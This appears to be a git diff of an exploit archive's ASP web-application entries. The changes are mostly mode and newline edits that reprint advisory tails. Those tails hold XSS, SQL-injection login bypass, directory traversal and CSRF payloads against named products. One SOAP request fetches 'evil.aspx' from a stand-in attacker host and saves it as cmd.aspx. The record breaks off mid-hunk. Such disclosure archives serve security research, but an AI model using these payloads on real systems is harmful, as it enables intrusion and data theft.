a/platforms/asp/webapps/32736.txt b/platforms/asp/webapps/32736.txt old mode 100755 new mode 100644 index 8ba9d39d2..9c86c2893 --- a/platforms/asp/webapps/32736.txt +++ b/platforms/asp/webapps/32736.txt @@ -4,4 +4,4 @@ DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQ Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer \ No newline at end of file +http://www.example.com/[Path]/inc_webblogmanager.asp?CategoryID=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&ItemID=1&action=refer \ No newline at end of file diff --git a/platforms/asp/webapps/32748.txt b/platforms/asp/webapps/32748.txt old mode 100755 new mode 100644 index a872d10fa..97473579a --- a/platforms/asp/webapps/32748.txt +++ b/platforms/asp/webapps/32748.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow BBSXP 5.13 and prior are vulnerable. -http://www.example.com/bbs/error.asp?message=xss \ No newline at end of file +http://www.example.com/bbs/error.asp?message=xss \ No newline at end of file diff --git a/platforms/asp/webapps/32750.txt b/platforms/asp/webapps/32750.txt old mode 100755 new mode 100644 index 970c57de0..8c3ff5dac --- a/platforms/asp/webapps/32750.txt +++ b/platforms/asp/webapps/32750.txt @@ -4,4 +4,4 @@ OBLOG is prone to a cross-site scripting vulnerability because it fails to suffi An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/oblog/err.asp?message=xss \ No newline at end of file +http://www.example.com/oblog/err.asp?message=xss \ No newline at end of file diff --git a/platforms/asp/webapps/32756.txt b/platforms/asp/webapps/32756.txt old mode 100755 new mode 100644 index ad1e15b6a..2806e4193 --- a/platforms/asp/webapps/32756.txt +++ b/platforms/asp/webapps/32756.txt @@ -4,4 +4,4 @@ LDF is prone to an SQL-injection vulnerability because it fails to sufficiently Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[ldf path]/login.asp?user=[SQL COMMAND] \ No newline at end of file +http://www.example.com/[ldf path]/login.asp?user=[SQL COMMAND] \ No newline at end of file diff --git a/platforms/asp/webapps/32758.txt b/platforms/asp/webapps/32758.txt old mode 100755 new mode 100644 index 9ef680bfd..ab285c406 --- a/platforms/asp/webapps/32758.txt +++ b/platforms/asp/webapps/32758.txt @@ -4,4 +4,4 @@ Lootan is prone to an SQL-injection vulnerability because it fails to sufficient Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/[path]/login.asp?username=[SQL COMMAND] \ No newline at end of file +http://www.example.com/[path]/login.asp?username=[SQL COMMAND] \ No newline at end of file diff --git a/platforms/asp/webapps/32797.txt b/platforms/asp/webapps/32797.txt old mode 100755 new mode 100644 index 966b8b65c..61614c3ef --- a/platforms/asp/webapps/32797.txt +++ b/platforms/asp/webapps/32797.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Banking@Home 2.1 is vulnerable; other versions may also be affected. -http://www.example.com/document_root/Login.asp?LoginName='Some_SQL_Stuff&Password=&submit=Login \ No newline at end of file +http://www.example.com/document_root/Login.asp?LoginName='Some_SQL_Stuff&Password=&submit=Login \ No newline at end of file diff --git a/platforms/asp/webapps/32833.txt b/platforms/asp/webapps/32833.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32874.txt b/platforms/asp/webapps/32874.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32882.txt b/platforms/asp/webapps/32882.txt old mode 100755 new mode 100644 index 9c3b4e8b1..932f84f9e --- a/platforms/asp/webapps/32882.txt +++ b/platforms/asp/webapps/32882.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow NOTE: This issue may be related to the one described in BID 12107 (Business Objects Crystal Enterprise Report File Cross-Site Scripting Vulnerability). We will update or retire this BID when more information emerges. -https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect \ No newline at end of file +https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect \ No newline at end of file diff --git a/platforms/asp/webapps/32888.txt b/platforms/asp/webapps/32888.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32898.txt b/platforms/asp/webapps/32898.txt old mode 100755 new mode 100644 index 5eaf3ebfc..aec897c40 --- a/platforms/asp/webapps/32898.txt +++ b/platforms/asp/webapps/32898.txt @@ -8,4 +8,4 @@ Absolute Form Processor XE 1.5 is vulnerable; other versions may also be affecte The following example input is available: -username: ' or '1=1 \ No newline at end of file +username: ' or '1=1 \ No newline at end of file diff --git a/platforms/asp/webapps/32903.txt b/platforms/asp/webapps/32903.txt old mode 100755 new mode 100644 index 46ac05275..78f3f3e04 --- a/platforms/asp/webapps/32903.txt +++ b/platforms/asp/webapps/32903.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc The following example data is available: -username: ' or 1=(Select top 1 WAM_UserID from WebAppMgrs)-- \ No newline at end of file +username: ' or 1=(Select top 1 WAM_UserID from WebAppMgrs)-- \ No newline at end of file diff --git a/platforms/asp/webapps/3295.txt b/platforms/asp/webapps/3295.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/32953.vbs b/platforms/asp/webapps/32953.vbs old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33009.txt b/platforms/asp/webapps/33009.txt old mode 100755 new mode 100644 index c102577d7..e980368c5 --- a/platforms/asp/webapps/33009.txt +++ b/platforms/asp/webapps/33009.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow The issue affects versions prior to DotNetNuke 4.9.4. -http://www.example.com/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http://www.example.net/XSS.html%22%3 \ No newline at end of file +http://www.example.com/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http://www.example.net/XSS.html%22%3 \ No newline at end of file diff --git a/platforms/asp/webapps/3301.txt b/platforms/asp/webapps/3301.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3317.txt b/platforms/asp/webapps/3317.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33171.txt b/platforms/asp/webapps/33171.txt old mode 100755 new mode 100644 index 91ed77f3e..9e4e4a731 --- a/platforms/asp/webapps/33171.txt +++ b/platforms/asp/webapps/33171.txt @@ -8,4 +8,4 @@ DUgallery 3.0 is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/Accessories/admin/edit.asp?iPic=[PictureID] \ No newline at end of file +http://www.example.com/Accessories/admin/edit.asp?iPic=[PictureID] \ No newline at end of file diff --git a/platforms/asp/webapps/3318.txt b/platforms/asp/webapps/3318.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3321.txt b/platforms/asp/webapps/3321.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33236.txt b/platforms/asp/webapps/33236.txt old mode 100755 new mode 100644 index 12e1acc37..e540f8309 --- a/platforms/asp/webapps/33236.txt +++ b/platforms/asp/webapps/33236.txt @@ -4,4 +4,4 @@ MaxWebPortal is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/forum.asp?FORUM_ID=42&CAT_ID=7+and+1=convert%28int,@@version%29-- \ No newline at end of file +http://www.example.com/forum.asp?FORUM_ID=42&CAT_ID=7+and+1=convert%28int,@@version%29-- \ No newline at end of file diff --git a/platforms/asp/webapps/33268.html b/platforms/asp/webapps/33268.html old mode 100755 new mode 100644 index 0a68d2d8a..f41d084e7 --- a/platforms/asp/webapps/33268.html +++ b/platforms/asp/webapps/33268.html @@ -6,4 +6,4 @@ Attacker-supplied HTML or JavaScript code could run in the context of the affect AfterLogic WebMail Pro 4.7.10 and prior versions are affected. -<html> <head> </head> <body onLoad="document.form1.submit()"> <form name="form1" method="post" action="http://www.example.com/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;"> <input type="hidden" name="HistoryKey" value="value"/> <input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/> </form> </body> </html> \ No newline at end of file +<html> <head> </head> <body onLoad="document.form1.submit()"> <form name="form1" method="post" action="http://www.example.com/history-storage.aspx?param=0.21188772204998574" onSubmit="return false;"> <input type="hidden" name="HistoryKey" value="value"/> <input type="hidden" name="HistoryStorageObjectName" value="location; alert('xss'); //"/> </form> </body> </html> \ No newline at end of file diff --git a/platforms/asp/webapps/33361.txt b/platforms/asp/webapps/33361.txt old mode 100755 new mode 100644 index 0534bd7ee..2dbf18571 --- a/platforms/asp/webapps/33361.txt +++ b/platforms/asp/webapps/33361.txt @@ -14,4 +14,4 @@ Other products may also be affected. The following proof-of-concept login and password examples are available: admin 'or' '=' -password 'or' '=' \ No newline at end of file +password 'or' '=' \ No newline at end of file diff --git a/platforms/asp/webapps/3339.txt b/platforms/asp/webapps/3339.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33647.txt b/platforms/asp/webapps/33647.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33700.txt b/platforms/asp/webapps/33700.txt old mode 100755 new mode 100644 index 9a9db24b5..4ea9f077d --- a/platforms/asp/webapps/33700.txt +++ b/platforms/asp/webapps/33700.txt @@ -134,4 +134,4 @@ security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. --- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen \ No newline at end of file diff --git a/platforms/asp/webapps/33704.txt b/platforms/asp/webapps/33704.txt old mode 100755 new mode 100644 index f5322ff59..7e5d04e6c --- a/platforms/asp/webapps/33704.txt +++ b/platforms/asp/webapps/33704.txt @@ -21,4 +21,4 @@ We shouldnt encode the script, or, the xss will fail. Liscker -2010.3.4 \ No newline at end of file +2010.3.4 \ No newline at end of file diff --git a/platforms/asp/webapps/33715.txt b/platforms/asp/webapps/33715.txt old mode 100755 new mode 100644 index e57fa645a..266eda89b --- a/platforms/asp/webapps/33715.txt +++ b/platforms/asp/webapps/33715.txt @@ -4,4 +4,4 @@ Spectrum Software WebManager CMS is prone to a cross-site scripting vulnerabilit An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. -http://www.example.com/Search_1.aspx?pojam=[XSS] \ No newline at end of file +http://www.example.com/Search_1.aspx?pojam=[XSS] \ No newline at end of file diff --git a/platforms/asp/webapps/33720.txt b/platforms/asp/webapps/33720.txt old mode 100755 new mode 100644 index a69bb8430..24fec50ac --- a/platforms/asp/webapps/33720.txt +++ b/platforms/asp/webapps/33720.txt @@ -4,4 +4,4 @@ Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fail Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/elearning/search_result.asp?courses=1&course_ID=[SQL] \ No newline at end of file +http://www.example.com/elearning/search_result.asp?courses=1&course_ID=[SQL] \ No newline at end of file diff --git a/platforms/asp/webapps/33721.txt b/platforms/asp/webapps/33721.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33722.txt b/platforms/asp/webapps/33722.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33728.txt b/platforms/asp/webapps/33728.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33730.txt b/platforms/asp/webapps/33730.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33758.txt b/platforms/asp/webapps/33758.txt old mode 100755 new mode 100644 index 4aca5c52d..8e910604f --- a/platforms/asp/webapps/33758.txt +++ b/platforms/asp/webapps/33758.txt @@ -4,4 +4,4 @@ Zigurrat Farsi CMS is prone to an SQL-injection vulnerability because it fails t Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/manager/textbox.asp?id=' \ No newline at end of file +http://www.example.com/manager/textbox.asp?id=' \ No newline at end of file diff --git a/platforms/asp/webapps/33761.txt b/platforms/asp/webapps/33761.txt old mode 100755 new mode 100644 index a8acbfcde..1f346f0cd --- a/platforms/asp/webapps/33761.txt +++ b/platforms/asp/webapps/33761.txt @@ -4,4 +4,4 @@ Pars CMS is prone to multiple SQL-injection vulnerabilities because it fails to Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM validTableName%00 \ No newline at end of file +http://www.example.com/fa_default.asp?RP=' UNION SELECT TOP 3 AttrName FROM validTableName%00 \ No newline at end of file diff --git a/platforms/asp/webapps/33825.txt b/platforms/asp/webapps/33825.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33840.txt b/platforms/asp/webapps/33840.txt old mode 100755 new mode 100644 index f0721090e..e8eac175c --- a/platforms/asp/webapps/33840.txt +++ b/platforms/asp/webapps/33840.txt @@ -4,4 +4,4 @@ Ziggurat Farsi CMS is prone to a directory-traversal vulnerability because it fa Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks. -http://www.example.com/manager/backup.asp?bck=./../file.asp \ No newline at end of file +http://www.example.com/manager/backup.asp?bck=./../file.asp \ No newline at end of file diff --git a/platforms/asp/webapps/3390.txt b/platforms/asp/webapps/3390.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33923.txt b/platforms/asp/webapps/33923.txt old mode 100755 new mode 100644 index 40fdd6a2f..dc5e56a1d --- a/platforms/asp/webapps/33923.txt +++ b/platforms/asp/webapps/33923.txt @@ -4,4 +4,4 @@ SamaGraph CMS is prone to an SQL-injection vulnerability because it fails to suf Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/inside.aspx?g=' or '1'='1'-- \ No newline at end of file +http://www.example.com/inside.aspx?g=' or '1'='1'-- \ No newline at end of file diff --git a/platforms/asp/webapps/33959.txt b/platforms/asp/webapps/33959.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/33992.txt b/platforms/asp/webapps/33992.txt old mode 100755 new mode 100644 index 01bbfa683..94a317185 --- a/platforms/asp/webapps/33992.txt +++ b/platforms/asp/webapps/33992.txt @@ -8,4 +8,4 @@ Platnik 8.01.001 is affected; other versions may also be vulnerable. INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)-- INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)-- -or 1=1-- \ No newline at end of file +or 1=1-- \ No newline at end of file diff --git a/platforms/asp/webapps/34034.txt b/platforms/asp/webapps/34034.txt old mode 100755 new mode 100644 index 118f5c718..943a1bebc --- a/platforms/asp/webapps/34034.txt +++ b/platforms/asp/webapps/34034.txt @@ -4,4 +4,4 @@ cyberhost is prone to an SQL-injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye \ No newline at end of file +http://www.example.com/default.asp?gb=paketayrinti&id=18+union+select+0,1,2,3,4,5,6,7+from+uye \ No newline at end of file diff --git a/platforms/asp/webapps/34180.txt b/platforms/asp/webapps/34180.txt old mode 100755 new mode 100644 index c13849831..983b31aa0 --- a/platforms/asp/webapps/34180.txt +++ b/platforms/asp/webapps/34180.txt @@ -4,4 +4,4 @@ webConductor is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/cs-cms/default.asp?id=70+and+1=0+ Union 2,3,4,5,6,7,8,9,10 (tables & column) \ No newline at end of file +http://www.example.com/cs-cms/default.asp?id=70+and+1=0+ Union 2,3,4,5,6,7,8,9,10 (tables & column) \ No newline at end of file diff --git a/platforms/asp/webapps/34194.txt b/platforms/asp/webapps/34194.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34221.txt b/platforms/asp/webapps/34221.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34343.txt b/platforms/asp/webapps/34343.txt old mode 100755 new mode 100644 index 8067d49fd..d6d41d8b6 --- a/platforms/asp/webapps/34343.txt +++ b/platforms/asp/webapps/34343.txt @@ -8,4 +8,4 @@ MOJO IWMS 7 is vulnerable; other versions may also be affected. The following example URI is available: -http://www.example.com/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E \ No newline at end of file +http://www.example.com/upload/default.asp?mode=wrong&ERRMSG=%3Cmeta+http-equiv='Set-cookie'+content='[Cookie-Name]=[Cookie-Value]'%3E \ No newline at end of file diff --git a/platforms/asp/webapps/34344.txt b/platforms/asp/webapps/34344.txt old mode 100755 new mode 100644 index 016bdcee5..313cacfef --- a/platforms/asp/webapps/34344.txt +++ b/platforms/asp/webapps/34344.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a The following example data is available: User : 1'or'1'='1 -Pass : 1'or'1'='1 \ No newline at end of file +Pass : 1'or'1'='1 \ No newline at end of file diff --git a/platforms/asp/webapps/3437.txt b/platforms/asp/webapps/3437.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34376.txt b/platforms/asp/webapps/34376.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34380.txt b/platforms/asp/webapps/34380.txt old mode 100755 new mode 100644 index 95c4c2827..582ec8947 --- a/platforms/asp/webapps/34380.txt +++ b/platforms/asp/webapps/34380.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Active Business Directory 2 is vulnerable; other versions may also be affected. -http://www.example.com/demoactivebusinessdirectory/searchadvance.asp? <= xss \ No newline at end of file +http://www.example.com/demoactivebusinessdirectory/searchadvance.asp? <= xss \ No newline at end of file diff --git a/platforms/asp/webapps/34397.txt b/platforms/asp/webapps/34397.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34411.txt b/platforms/asp/webapps/34411.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34429.txt b/platforms/asp/webapps/34429.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34492.txt b/platforms/asp/webapps/34492.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34614.txt b/platforms/asp/webapps/34614.txt old mode 100755 new mode 100644 index ccf6f9a27..f57f27452 --- a/platforms/asp/webapps/34614.txt +++ b/platforms/asp/webapps/34614.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SmarterTools SmarterStats 5.3.3819 is vulnerable; other versions may also be affected. -https://www.example.com/UserControls/Popups/frmHelp.aspx?url='%22--%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E \ No newline at end of file +https://www.example.com/UserControls/Popups/frmHelp.aspx?url='%22--%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/3466.txt b/platforms/asp/webapps/3466.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34687.txt b/platforms/asp/webapps/34687.txt old mode 100755 new mode 100644 index 91122c048..6dd662938 --- a/platforms/asp/webapps/34687.txt +++ b/platforms/asp/webapps/34687.txt @@ -4,4 +4,4 @@ Smart ASP Survey is prone to a SQL-injection vulnerability because it fails to s Exploiting the vulnerability could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/poll/showresult.asp?catid=[sqli] \ No newline at end of file +http://www.example.com/poll/showresult.asp?catid=[sqli] \ No newline at end of file diff --git a/platforms/asp/webapps/3469.txt b/platforms/asp/webapps/3469.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3470.htm b/platforms/asp/webapps/3470.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3481.htm b/platforms/asp/webapps/3481.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34864.txt b/platforms/asp/webapps/34864.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34920.txt b/platforms/asp/webapps/34920.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3493.txt b/platforms/asp/webapps/3493.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/34936.txt b/platforms/asp/webapps/34936.txt old mode 100755 new mode 100644 index 92cfa73fa..46b6df6d6 --- a/platforms/asp/webapps/34936.txt +++ b/platforms/asp/webapps/34936.txt @@ -6,4 +6,4 @@ Remote attackers can use a specially crafted request with directory-traversal se i-Gallery 3.4 and 4.1 are vulnerable; other versions may also be affected. -http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir \ No newline at end of file +http://www.example.com/igallery41/streamfile.asp?i=./../../../index.asp&f=subdir \ No newline at end of file diff --git a/platforms/asp/webapps/34948.txt b/platforms/asp/webapps/34948.txt old mode 100755 new mode 100644 index 26a4bfd37..f3583d25b --- a/platforms/asp/webapps/34948.txt +++ b/platforms/asp/webapps/34948.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to upload and execute arbitrary ASP code in t Douran Portal versions 3.9.7.55 and prior are vulnerable. -http://www.example.com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script> \ No newline at end of file +http://www.example.com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=<script>alert('ITSecTeam')</script> \ No newline at end of file diff --git a/platforms/asp/webapps/34971.txt b/platforms/asp/webapps/34971.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35031.txt b/platforms/asp/webapps/35031.txt old mode 100755 new mode 100644 index d54dbf8d0..d3249a66f --- a/platforms/asp/webapps/35031.txt +++ b/platforms/asp/webapps/35031.txt @@ -6,4 +6,4 @@ Exploiting these vulnerabilities could allow an attacker to steal cookie-based a BugTracker.NET v3.4.4 is vulnerable; other versions may be affected. -http://www.example.com/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E \ No newline at end of file +http://www.example.com/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/35045.txt b/platforms/asp/webapps/35045.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35048.txt b/platforms/asp/webapps/35048.txt old mode 100755 new mode 100644 index 2c34f5f20..4c910c45b --- a/platforms/asp/webapps/35048.txt +++ b/platforms/asp/webapps/35048.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Techno Dreams Articles & Papers Package 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/papers/ArticlesTablelist.asp?order=[Code] \ No newline at end of file +http://www.example.com/papers/ArticlesTablelist.asp?order=[Code] \ No newline at end of file diff --git a/platforms/asp/webapps/35049.txt b/platforms/asp/webapps/35049.txt old mode 100755 new mode 100644 index ed1919653..8b5412bf5 --- a/platforms/asp/webapps/35049.txt +++ b/platforms/asp/webapps/35049.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Techno Dreams FAQ Manager Package 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/FAQ/faqlist.asp?order=[Code] \ No newline at end of file +http://www.example.com/FAQ/faqlist.asp?order=[Code] \ No newline at end of file diff --git a/platforms/asp/webapps/35065.txt b/platforms/asp/webapps/35065.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35168.txt b/platforms/asp/webapps/35168.txt old mode 100755 new mode 100644 index 728eb0c21..20cc7e959 --- a/platforms/asp/webapps/35168.txt +++ b/platforms/asp/webapps/35168.txt @@ -21,4 +21,4 @@ The following example SOAP requests are available: 3. <GetFile xmlns="http://dotnetblogengine.net/"> <source>http://attacker/evil.aspx</source> <destination>/../../cmd.aspx</destination> -</GetFile> \ No newline at end of file +</GetFile> \ No newline at end of file diff --git a/platforms/asp/webapps/3520.txt b/platforms/asp/webapps/3520.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35310.txt b/platforms/asp/webapps/35310.txt old mode 100755 new mode 100644 index e4646ec68..4655c6bcb --- a/platforms/asp/webapps/35310.txt +++ b/platforms/asp/webapps/35310.txt @@ -5,4 +5,4 @@ Web Wiz Forums is prone to multiple SQL-injection vulnerabilities because the ap A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/default.asp?pid=[SQLi] -http://www.example.com/viewproduct.asp?PID=[SQli] \ No newline at end of file +http://www.example.com/viewproduct.asp?PID=[SQli] \ No newline at end of file diff --git a/platforms/asp/webapps/3534.txt b/platforms/asp/webapps/3534.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3536.txt b/platforms/asp/webapps/3536.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35411.txt b/platforms/asp/webapps/35411.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35412.txt b/platforms/asp/webapps/35412.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3546.txt b/platforms/asp/webapps/3546.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3549.txt b/platforms/asp/webapps/3549.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3550.txt b/platforms/asp/webapps/3550.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3551.txt b/platforms/asp/webapps/3551.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/3556.htm b/platforms/asp/webapps/3556.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35576.txt b/platforms/asp/webapps/35576.txt old mode 100755 new mode 100644 index 5419b028e..e9d44e704 --- a/platforms/asp/webapps/35576.txt +++ b/platforms/asp/webapps/35576.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Omer Portal 3.220060425 is vulnerable; other versions may also be affected. -http://www.example.com/arama_islem.asp?aramadeger=<script>alert(1)</script> \ No newline at end of file +http://www.example.com/arama_islem.asp?aramadeger=<script>alert(1)</script> \ No newline at end of file diff --git a/platforms/asp/webapps/3558.htm b/platforms/asp/webapps/3558.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35599.txt b/platforms/asp/webapps/35599.txt old mode 100755 new mode 100644 index c1cc9c183..47bd101a8 --- a/platforms/asp/webapps/35599.txt +++ b/platforms/asp/webapps/35599.txt @@ -11,4 +11,4 @@ The following example URI and data are available: http://www.example.com/[path]/CMSadmin/default.asp Username : admin -Password : 1'or'1'='1 \ No newline at end of file +Password : 1'or'1'='1 \ No newline at end of file diff --git a/platforms/asp/webapps/35728.txt b/platforms/asp/webapps/35728.txt old mode 100755 new mode 100644 index bf33d7ee3..fd0b3da3f --- a/platforms/asp/webapps/35728.txt +++ b/platforms/asp/webapps/35728.txt @@ -8,4 +8,4 @@ Keyfax Customer Response Management 3.2.2.6 is vulnerable; other versions may al http://www.example.com/keyfax32/test/response.asp?co="style%3d"x:expression(alert(1))""%20"; -http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20"; \ No newline at end of file +http://www.example.com/keyfax32/rs/main_rs.asp?C="style%3d"x:expression(alert(1))""%20"; \ No newline at end of file diff --git a/platforms/asp/webapps/35758.txt b/platforms/asp/webapps/35758.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35807.txt b/platforms/asp/webapps/35807.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/35852.txt b/platforms/asp/webapps/35852.txt old mode 100755 new mode 100644 index c193f581d..4b082c851 --- a/platforms/asp/webapps/35852.txt +++ b/platforms/asp/webapps/35852.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary commands in the context of Microsoft Lync Server 2010 version 4.0.7577.0 is vulnerable; other versions may also be affected. -https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29// \ No newline at end of file +https://www.example.com/Reach/Client/WebPages/ReachJoin.aspx?xml=&&reachLocale=en-us%22;var%20xxx=%22http://www.foofus.net/~bede/foofuslogo.jpg%22;open%28xxx%29;alert%28%22error,%20please%20enable%20popups%20from%20this%20server%20and%20reload%20from%20the%20link%20you%20were%20given%22%29// \ No newline at end of file diff --git a/platforms/asp/webapps/35872.txt b/platforms/asp/webapps/35872.txt old mode 100755 new mode 100644 index c90bf5ae7..fadae23a7 --- a/platforms/asp/webapps/35872.txt +++ b/platforms/asp/webapps/35872.txt @@ -5,4 